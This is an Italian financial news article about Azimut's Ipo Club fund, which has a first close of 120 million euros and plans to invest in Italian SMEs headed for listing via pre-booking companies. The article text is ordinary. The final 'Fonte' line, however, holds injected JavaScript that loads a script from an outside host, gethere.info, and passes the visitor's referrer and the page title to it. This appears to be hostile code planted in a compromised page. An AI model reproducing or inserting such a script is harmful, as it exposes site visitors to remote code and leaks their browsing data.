di Paola Valentini
Azimut ha raggiunto il primo obbiettivo di raccolta di Ipo Club, fondo chiuso focalizzato al sostegno di pmi italiane con prospettive di crescita brillanti. Il veicolo diventa da oggi operativo con una dotazione di 120 milioni di euro. Ipo Club è nato anche grazie al contributo determinante di Azimut Global Counseling, società di Azimut che opera nel settore del financial advisory, e di Electa Ventures, azienda del gruppo Electa già pioniere nella realizzazione di Spac e pre-booking company in Italia. La raccolta, che proseguirà fino a un massimo di 150 milioni di euro, è avvenuta tramite i canali distributivi del gruppo Azimut e ha coinvolto circa 100 investitori, di cui 70 imprenditori decisi a partecipare alla crescita di medie aziende che verranno selezionate dal fondo.

L’obiettivo di Ipo Club, che ha un orizzonte di investimento di cinque anni, è investire in una decina di imprese italiane con un valore del capitale sociale fino a circa 300 milioni di euro ciascuna, che presentino concrete possibilità di sviluppo, anche a livello internazionale, e di redditività tali da condurle alla quotazione in borsa e ad un processo di importante crescita nel corso dei successivi 3-5 anni. Ipo Club conta di realizzare i primi due investimenti entro la prossima estate.

Il fondo investirà in strumenti finanziari emessi principalmente da pre-booking company, veicoli di investimento evoluzione delle Spac costituiti ad hoc da Ipo Club per convogliare il capitale degli investitori nell’acquisizione di quote di minoranza di società da quotare entro pochi mesi dalla definizione dell’accordo di investimento.

Delle pre-booking company costituite, Ipo Club sarà il principale investitore con il 30% del capitale totale, mentre il restante 70% sarà raccolto tra gli investitori qualificati di volta in volta interessati alle singole operazioni. Grazie a questo sistema aperto, la portata dell’iniziativa risulta essere molto più ampia rispetto alla sola dotazione del fondo, arrivando a mettere a disposizione dell’imprenditoria italiana eccellente oltre 400 milioni di euro per Ipo accelerate.

“Ipo Club rientra nell’iniziativa Azimut Libera Impresa ed è un’innovazione di assoluto rilievo per il mercato italiano. Il fondo è stato realizzato grazie al contributo di professionisti quali Simone Strocchi, fondatore e managing partner dell’advisory & investment firm Electa e tra i principali pionieri nell’ideazione e realizzazione delle Spac in Italia, e Giancarlo Maestrini, ceo di Azimut Global Counseling, che hanno fortemente creduto in questo progetto. Con Ipo Club daremo impulso all’economia reale del nostro Paese investendo a medio termine in progetti di sviluppo industriale con modalità e finalità del tutto nuove e allo stesso tempo offriremo un’asset class alternativa con rendimenti sicuramente attraenti nell’attuale contesto di tassi bassi”, ha sottolineato Sergio Albarelli, ceo del gruppo Azimut .
Fonte: logo_mfs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;